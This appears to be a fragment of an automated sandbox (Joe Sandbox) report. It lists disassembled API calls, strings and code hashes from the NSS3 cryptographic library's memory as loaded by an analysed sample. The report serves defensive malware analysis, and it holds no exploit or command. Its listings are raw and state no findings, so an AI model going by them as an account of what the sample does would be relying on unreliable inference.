                                                                                • TlsGetValue.KERNEL32(00000000,00000000,?,6CFD124D,00000001), ref: 6CFC8D19
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,6CFD124D,00000001), ref: 6CFC8D32
                                                                                • PL_ArenaRelease.NSS3(?,?,?,?,?,6CFD124D,00000001), ref: 6CFC8D73
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6CFD124D,00000001), ref: 6CFC8D8C
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6CFD124D,00000001), ref: 6CFC8DBA
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                • String ID: KRAM$KRAM
                                                                                • API String ID: 2419422920-169145855
                                                                                • Opcode ID: e755819a3b7b155a0ea77c4069e3ea2051730a8c15a7586a75210bdf189f8b73
                                                                                • Instruction ID: 60cd5f85c97dabee10c06ed92a3f4f5cc52f8bbbace265b3e4d7d0ed931b4066
                                                                                • Opcode Fuzzy Hash: e755819a3b7b155a0ea77c4069e3ea2051730a8c15a7586a75210bdf189f8b73
                                                                                • Instruction Fuzzy Hash: 80214DB5B046028FDB00AF78C58476BB7F1FF45318F15896AD99987701EB34D892CB92
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CFEACE6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFEAD14
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFEAD23
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFEAD39
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: L_strncpyzPrint$L_strcatn
                                                                                • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                                • API String ID: 332880674-3521875567
                                                                                • Opcode ID: 528ac974080cc9141c6985bf1a258d6e3c038e18c60add0b26dd50254981541f
                                                                                • Instruction ID: 63d55dea20a15f770ff48a9faf9d297e45bc66cf47f3d799346a6da5f86dd369
                                                                                • Opcode Fuzzy Hash: 528ac974080cc9141c6985bf1a258d6e3c038e18c60add0b26dd50254981541f
                                                                                • Instruction Fuzzy Hash: 81213B71900104EFEB20DB65FE86B6F3BF5EB4A30DF054029F91A97252DBB09908C792
                                                                                APIs
                                                                                • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D084DC3
                                                                                • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D084DE0
                                                                                Strings
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D084DCB
                                                                                • API call with %s database connection pointer, xrefs: 6D084DBD
                                                                                • %s at line %d of [%.10s], xrefs: 6D084DDA
                                                                                • invalid, xrefs: 6D084DB8
                                                                                • misuse, xrefs: 6D084DD5
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                • API String ID: 632333372-2974027950
                                                                                • Opcode ID: 6b57473240fc03db5845f152d718f9c9e87932d95098cf54dac54f26f5e119a6
                                                                                • Instruction ID: f0fa90c105a77f6d9b90bd06e28c597bb620f5b829de961eafda6520fa07df47
                                                                                • Opcode Fuzzy Hash: 6b57473240fc03db5845f152d718f9c9e87932d95098cf54dac54f26f5e119a6
                                                                                • Instruction Fuzzy Hash: 39F0B415E147693FFB009125DD10FA63BDE9F09359F4601A1ED0CAB2D3D605D9508291
                                                                                APIs
                                                                                • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D084E30
                                                                                • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D084E4D
                                                                                Strings
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D084E38
                                                                                • API call with %s database connection pointer, xrefs: 6D084E2A
                                                                                • %s at line %d of [%.10s], xrefs: 6D084E47
                                                                                • invalid, xrefs: 6D084E25
                                                                                • misuse, xrefs: 6D084E42
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                • API String ID: 632333372-2974027950
                                                                                • Opcode ID: 076405b79e0003cfe104ffd9ceb420e9bebe9d8f4146e581d4cfea1d8c241b78
                                                                                • Instruction ID: 45996b00816715eba571efe04011008d250c75f27b1d373755bab5185a09dcbe
                                                                                • Opcode Fuzzy Hash: 076405b79e0003cfe104ffd9ceb420e9bebe9d8f4146e581d4cfea1d8c241b78
                                                                                • Instruction Fuzzy Hash: ACF08C15E44A293FFF1051259C10FB637CF9B1A366F5900A2EA0CA76D3E629DA6142A2
                                                                                APIs
                                                                                • PR_SetError.NSS3(00000000,00000000,6CFF1444,?,00000001,?,00000000,00000000,?,?,6CFF1444,?,?,00000000,?,?), ref: 6CFF0CB3
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CFF1444,?,00000001,?,00000000,00000000,?,?,6CFF1444,?), ref: 6CFF0DC1
                                                                                • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CFF1444,?,00000001,?,00000000,00000000,?,?,6CFF1444,?), ref: 6CFF0DEC
                                                                                  • Part of subcall function 6D010F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CFB2AF5,?,?,?,?,?,6CFB0A1B,00000000), ref: 6D010F1A
                                                                                  • Part of subcall function 6D010F10: malloc.MOZGLUE(00000001), ref: 6D010F30
                                                                                  • Part of subcall function 6D010F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6D010F42
                                                                                • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CFF1444,?,00000001,?,00000000,00000000,?), ref: 6CFF0DFF
                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CFF1444,?,00000001,?,00000000), ref: 6CFF0E16
                                                                                • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CFF1444,?,00000001,?,00000000,00000000,?), ref: 6CFF0E53
                                                                                • PR_GetCurrentThread.NSS3(?,?,?,?,6CFF1444,?,00000001,?,00000000,00000000,?,?,6CFF1444,?,?,00000000), ref: 6CFF0E65
                                                                                • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CFF1444,?,00000001,?,00000000,00000000,?), ref: 6CFF0E79
                                                                                  • Part of subcall function 6D001560: TlsGetValue.KERNEL32(00000000,?,6CFD0844,?), ref: 6D00157A
                                                                                  • Part of subcall function 6D001560: EnterCriticalSection.KERNEL32(?,?,?,6CFD0844,?), ref: 6D00158F
                                                                                  • Part of subcall function 6D001560: PR_Unlock.NSS3(?,?,?,?,6CFD0844,?), ref: 6D0015B2
                                                                                  • Part of subcall function 6CFCB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CFD1397,00000000,?,6CFCCF93,5B5F5EC0,00000000,?,6CFD1397,?), ref: 6CFCB1CB
                                                                                  • Part of subcall function 6CFCB1A0: free.MOZGLUE(5B5F5EC0,?,6CFCCF93,5B5F5EC0,00000000,?,6CFD1397,?), ref: 6CFCB1D2
                                                                                  • Part of subcall function 6CFC89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CFC88AE,-00000008), ref: 6CFC8A04
                                                                                  • Part of subcall function 6CFC89E0: EnterCriticalSection.KERNEL32(?), ref: 6CFC8A15
                                                                                  • Part of subcall function 6CFC89E0: memset.VCRUNTIME140(6CFC88AE,00000000,00000132), ref: 6CFC8A27
                                                                                  • Part of subcall function 6CFC89E0: PR_Unlock.NSS3(?), ref: 6CFC8A35
                                                                                Similarity
                                                                                • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 1601681851-0
                                                                                • Opcode ID: 4a818022cd7680b7187b0f2b804a2c2e24e127dca7bbc08964a02a375da812a4
                                                                                • Instruction ID: faf3b07c07ac327576f5c9d272f1b1a1e0af859cc598764d0f095f37f6cd1fbc
                                                                                • Opcode Fuzzy Hash: 4a818022cd7680b7187b0f2b804a2c2e24e127dca7bbc08964a02a375da812a4
                                                                                • Instruction Fuzzy Hash: 2951A3B6E002015FFB009F64EC81BAF37A8EF05218F1A4464ED199B712FB71ED1586A2
                                                                                APIs
                                                                                  • Part of subcall function 6CFC8850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CFD0715), ref: 6CFC8859
                                                                                  • Part of subcall function 6CFC8850: PR_NewLock.NSS3 ref: 6CFC8874
                                                                                  • Part of subcall function 6CFC8850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CFC888D
                                                                                • PR_NewLock.NSS3 ref: 6CFC9CAD
                                                                                  • Part of subcall function 6D0798D0: calloc.MOZGLUE(00000001,00000084,6CFA0936,00000001,?,6CFA102C), ref: 6D0798E5
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07AD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07CD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07D6
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CF3204A), ref: 6CFA07E4
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,6CF3204A), ref: 6CFA0864
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CFA0880
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,6CF3204A), ref: 6CFA08CB
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08D7
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08FB
                                                                                • TlsGetValue.KERNEL32 ref: 6CFC9CE8
                                                                                • EnterCriticalSection.KERNEL32(?,?,6CFCECEC,6CFD2FCD,00000000,?,6CFD2FCD,?), ref: 6CFC9D01
                                                                                • TlsGetValue.KERNEL32(?,?,?,6CFCECEC,6CFD2FCD,00000000,?,6CFD2FCD,?), ref: 6CFC9D38
                                                                                • EnterCriticalSection.KERNEL32(?,?,6CFCECEC,6CFD2FCD,00000000,?,6CFD2FCD,?), ref: 6CFC9D4D
                                                                                • PR_Unlock.NSS3 ref: 6CFC9D70
                                                                                • PR_Unlock.NSS3 ref: 6CFC9DC3
                                                                                • PR_NewLock.NSS3 ref: 6CFC9DDD
                                                                                  • Part of subcall function 6CFC88D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CFD0725,00000000,00000058), ref: 6CFC8906
                                                                                  • Part of subcall function 6CFC88D0: EnterCriticalSection.KERNEL32(?), ref: 6CFC891A
                                                                                  • Part of subcall function 6CFC88D0: PL_ArenaAllocate.NSS3(?,?), ref: 6CFC894A
                                                                                  • Part of subcall function 6CFC88D0: calloc.MOZGLUE(00000001,6CFD072D,00000000,00000000,00000000,?,6CFD0725,00000000,00000058), ref: 6CFC8959
                                                                                  • Part of subcall function 6CFC88D0: memset.VCRUNTIME140(?,00000000,?), ref: 6CFC8993
                                                                                  • Part of subcall function 6CFC88D0: PR_Unlock.NSS3(?), ref: 6CFC89AF
                                                                                Similarity
                                                                                • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                • String ID:
                                                                                • API String ID: 3394263606-0
                                                                                • Opcode ID: 9fdedb238ceefb7c663eb0304045dafd090ef51eac33b071f6be8e74089ed225
                                                                                • Instruction ID: cd0d5c46f909e1e259dc582fd6d62f2cfd71d6abf0740afa5e42414a78ce7390
                                                                                • Opcode Fuzzy Hash: 9fdedb238ceefb7c663eb0304045dafd090ef51eac33b071f6be8e74089ed225
                                                                                • Instruction Fuzzy Hash: 12513F71B056068FDB00EF68C18476BBBF0BF44349F158529D8989B750DF70E984CB92
                                                                                APIs
                                                                                • PR_Now.NSS3 ref: 6CFBDCFA
                                                                                  • Part of subcall function 6D079DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D0C0A27), ref: 6D079DC6
                                                                                  • Part of subcall function 6D079DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D0C0A27), ref: 6D079DD1
                                                                                  • Part of subcall function 6D079DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D079DED
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CFBDD40
                                                                                • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CFBDD62
                                                                                • CERT_DestroyCertificate.NSS3(?), ref: 6CFBDD71
                                                                                • CERT_DestroyCertificate.NSS3(00000000), ref: 6CFBDD81
                                                                                • CERT_RemoveCertListNode.NSS3(?), ref: 6CFBDD8F
                                                                                  • Part of subcall function 6CFD06A0: TlsGetValue.KERNEL32 ref: 6CFD06C2
                                                                                  • Part of subcall function 6CFD06A0: EnterCriticalSection.KERNEL32(?), ref: 6CFD06D6
                                                                                  • Part of subcall function 6CFD06A0: PR_Unlock.NSS3 ref: 6CFD06EB
                                                                                • CERT_DestroyCertificate.NSS3(?), ref: 6CFBDD9E
                                                                                • CERT_DestroyCertificate.NSS3(?), ref: 6CFBDDB7
                                                                                Similarity
                                                                                • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                • String ID:
                                                                                • API String ID: 653623313-0
                                                                                • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                • Instruction ID: 8f44b9071a5366c46d89482a4e224300fc0cb2e71bb2efa1f849c739a4cdfd71
                                                                                • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                • Instruction Fuzzy Hash: 6C218FB6E011159BDF019E96DC80A9FB7B4AF09318F190024ED58B7709E731E915CBE2
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,6D02460B,?,?), ref: 6CFB3CA9
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFB3CB9
                                                                                • PL_HashTableLookup.NSS3(?), ref: 6CFB3CC9
                                                                                • SECITEM_DupItem_Util.NSS3(00000000), ref: 6CFB3CD6
                                                                                • PR_Unlock.NSS3 ref: 6CFB3CE6
                                                                                • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6CFB3CF6
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFB3D03
                                                                                • PR_Unlock.NSS3 ref: 6CFB3D15
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                Similarity
                                                                                • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                • String ID:
                                                                                • API String ID: 1376842649-0
                                                                                • Opcode ID: 9b156232eac83659cd83d9bebcfccdfe3bc90ab64487d3fe7448e48c17c12a32
                                                                                • Instruction ID: efee5027aef088f725fde589fdb40d85f393a424d123d51493a7b6df3354ef3e
                                                                                • Opcode Fuzzy Hash: 9b156232eac83659cd83d9bebcfccdfe3bc90ab64487d3fe7448e48c17c12a32
                                                                                • Instruction Fuzzy Hash: E7112CB6C40519ABEB011765FC02BAA7A7DEB4725CB150130ED1853211FF72D96CC6E1
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Errorfree$Alloc_CurrentThreadUtilmemcpy
                                                                                • String ID:
                                                                                • API String ID: 4163001165-0
                                                                                • Opcode ID: 173000621a3ebe1c2c6f3aa4288704b0c87be0593980fa70013bceaf3efb3bb9
                                                                                • Instruction ID: 28ac10f65251e5b3edf92f73ea2d5e4caae42b17e95d89e1ef88647bbb0d7554
                                                                                • Opcode Fuzzy Hash: 173000621a3ebe1c2c6f3aa4288704b0c87be0593980fa70013bceaf3efb3bb9
                                                                                • Instruction Fuzzy Hash: 02A1B275A087139FF714DF24D880B6AB7E9EF98304F064968E949DB252E730EA44C792
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE001,00000000), ref: 6D028C93
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                  • Part of subcall function 6D008A60: TlsGetValue.KERNEL32(6CFB61C4,?,6CFB5F9C,00000000), ref: 6D008A81
                                                                                  • Part of subcall function 6D008A60: TlsGetValue.KERNEL32(?,?,?,6CFB5F9C,00000000), ref: 6D008A9E
                                                                                  • Part of subcall function 6D008A60: EnterCriticalSection.KERNEL32(?,?,?,?,6CFB5F9C,00000000), ref: 6D008AB7
                                                                                  • Part of subcall function 6D008A60: PR_Unlock.NSS3(?,?,?,?,?,6CFB5F9C,00000000), ref: 6D008AD2
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6D028CFB
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6D028D10
                                                                                  • Part of subcall function 6D008970: TlsGetValue.KERNEL32(?,00000000,6CFB61C4,?,6CFB5639,00000000), ref: 6D008991
                                                                                  • Part of subcall function 6D008970: TlsGetValue.KERNEL32(?,?,?,?,?,6CFB5639,00000000), ref: 6D0089AD
                                                                                  • Part of subcall function 6D008970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CFB5639,00000000), ref: 6D0089C6
                                                                                  • Part of subcall function 6D008970: PR_WaitCondVar.NSS3 ref: 6D0089F7
                                                                                  • Part of subcall function 6D008970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6CFB5639,00000000), ref: 6D008A0C
                                                                                Similarity
                                                                                • API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
                                                                                • String ID:
                                                                                • API String ID: 2412912262-0
                                                                                • Opcode ID: 76bd7f529b31a05a3ece98444a855ff15ddc0aeb025a21affa7e661134d6ba18
                                                                                • Instruction ID: 43d81e0d30f3b40ebbb943fdfbe0844738efe2320862edc1810e5269d73d5478
                                                                                • Opcode Fuzzy Hash: 76bd7f529b31a05a3ece98444a855ff15ddc0aeb025a21affa7e661134d6ba18
                                                                                • Instruction Fuzzy Hash: CDB18CB4D042099BEB15CF65DC80BAEBBFAFF48308F10412DE91AA7351E731A956CB51
                                                                                APIs
                                                                                  • Part of subcall function 6CFD11C0: PR_NewLock.NSS3 ref: 6CFD1216
                                                                                • free.MOZGLUE(?), ref: 6CFB9E17
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFB9E25
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFB9E4E
                                                                                • TlsGetValue.KERNEL32 ref: 6CFB9EA2
                                                                                  • Part of subcall function 6CFC9500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6CFC9546
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFB9EB6
                                                                                • PR_Unlock.NSS3 ref: 6CFB9ED9
                                                                                • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CFB9F18
                                                                                Similarity
                                                                                • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                • String ID:
                                                                                • API String ID: 3381623595-0
                                                                                • Opcode ID: 569a460baa90d0786383ee6d6cedca2a48d03d51dc7fd99fcc98d3d88b0614cf
                                                                                • Instruction ID: 8151461992fb45eca467a5266c3e9315737d6f6c1e94387e43887f4a0670c8df
                                                                                • Opcode Fuzzy Hash: 569a460baa90d0786383ee6d6cedca2a48d03d51dc7fd99fcc98d3d88b0614cf
                                                                                • Instruction Fuzzy Hash: F681F4B1A00602ABEB109F25DC41BABB7F9BF55248F144528EC5597B41FF31EA14C7A2
                                                                                APIs
                                                                                  • Part of subcall function 6CFCAB10: DeleteCriticalSection.KERNEL32(D958E852,6CFD1397,5B5F5EC0,?,?,6CFCB1EE,2404110F,?,?), ref: 6CFCAB3C
                                                                                  • Part of subcall function 6CFCAB10: free.MOZGLUE(D958E836,?,6CFCB1EE,2404110F,?,?), ref: 6CFCAB49
                                                                                  • Part of subcall function 6CFCAB10: DeleteCriticalSection.KERNEL32(5D5E6D1C), ref: 6CFCAB5C
                                                                                  • Part of subcall function 6CFCAB10: free.MOZGLUE(5D5E6D10), ref: 6CFCAB63
                                                                                  • Part of subcall function 6CFCAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CFCAB6F
                                                                                  • Part of subcall function 6CFCAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CFCAB76
                                                                                • TlsGetValue.KERNEL32 ref: 6CFCDCFA
                                                                                • EnterCriticalSection.KERNEL32(00000000), ref: 6CFCDD0E
                                                                                • PK11_IsFriendly.NSS3(?), ref: 6CFCDD73
                                                                                • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6CFCDD8B
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFCDE81
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CFCDEA6
                                                                                • PR_Unlock.NSS3(?), ref: 6CFCDF08
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                APIs
                                                                                • CERT_NewCertList.NSS3 ref: 6CFDBD1E
                                                                                  • Part of subcall function 6CFB2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CFB2F0A
                                                                                  • Part of subcall function 6CFB2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CFB2F1D
                                                                                  • Part of subcall function 6CFF57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CFBB41E,00000000,00000000,?,00000000,?,6CFBB41E,00000000,00000000,00000001,?), ref: 6CFF57E0
                                                                                  • Part of subcall function 6CFF57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CFF5843
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CFDBD8C
                                                                                  • Part of subcall function 6D00FAB0: free.MOZGLUE(?,-00000001,?,?,6CFAF673,00000000,00000000), ref: 6D00FAC7
                                                                                • CERT_DestroyCertList.NSS3(00000000), ref: 6CFDBD9B
                                                                                • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CFDBDA9
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFDBE3A
                                                                                  • Part of subcall function 6CFB3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFB3EC2
                                                                                  • Part of subcall function 6CFB3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CFB3ED6
                                                                                  • Part of subcall function 6CFB3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CFB3EEE
                                                                                  • Part of subcall function 6CFB3E60: PR_CallOnce.NSS3(6D112AA4,6D0112D0), ref: 6CFB3F02
                                                                                  • Part of subcall function 6CFB3E60: PL_FreeArenaPool.NSS3 ref: 6CFB3F14
                                                                                  • Part of subcall function 6CFB3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CFB3F27
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFDBE52
                                                                                  • Part of subcall function 6CFB2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CFB2CDA,?,00000000), ref: 6CFB2E1E
                                                                                  • Part of subcall function 6CFB2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CFB2E33
                                                                                  • Part of subcall function 6CFB2E00: TlsGetValue.KERNEL32 ref: 6CFB2E4E
                                                                                  • Part of subcall function 6CFB2E00: EnterCriticalSection.KERNEL32(?), ref: 6CFB2E5E
                                                                                  • Part of subcall function 6CFB2E00: PL_HashTableLookup.NSS3(?), ref: 6CFB2E71
                                                                                  • Part of subcall function 6CFB2E00: PL_HashTableRemove.NSS3(?), ref: 6CFB2E84
                                                                                  • Part of subcall function 6CFB2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CFB2E96
                                                                                  • Part of subcall function 6CFB2E00: PR_Unlock.NSS3 ref: 6CFB2EA9
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFDBE61
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
                                                                                APIs
                                                                                • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CFFAB3E,?,?,?), ref: 6CFFAC35
                                                                                  • Part of subcall function 6CFDCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CFDCF16
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CFFAB3E,?,?,?), ref: 6CFFAC55
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CFFAB3E,?,?), ref: 6CFFAC70
                                                                                  • Part of subcall function 6CFDE300: TlsGetValue.KERNEL32 ref: 6CFDE33C
                                                                                  • Part of subcall function 6CFDE300: EnterCriticalSection.KERNEL32(?), ref: 6CFDE350
                                                                                  • Part of subcall function 6CFDE300: PR_Unlock.NSS3(?), ref: 6CFDE5BC
                                                                                  • Part of subcall function 6CFDE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CFDE5CA
                                                                                  • Part of subcall function 6CFDE300: TlsGetValue.KERNEL32 ref: 6CFDE5F2
                                                                                  • Part of subcall function 6CFDE300: EnterCriticalSection.KERNEL32(?), ref: 6CFDE606
                                                                                  • Part of subcall function 6CFDE300: PORT_Alloc_Util.NSS3(?), ref: 6CFDE613
                                                                                • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CFFAC92
                                                                                • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CFFAB3E), ref: 6CFFACD7
                                                                                • PORT_Alloc_Util.NSS3(?), ref: 6CFFAD10
                                                                                • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CFFAD2B
                                                                                  • Part of subcall function 6CFDF360: TlsGetValue.KERNEL32(00000000,?,6CFFA904,?), ref: 6CFDF38B
                                                                                  • Part of subcall function 6CFDF360: EnterCriticalSection.KERNEL32(?,?,?,6CFFA904,?), ref: 6CFDF3A0
                                                                                  • Part of subcall function 6CFDF360: PR_Unlock.NSS3(?,?,?,?,6CFFA904,?), ref: 6CFDF3D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
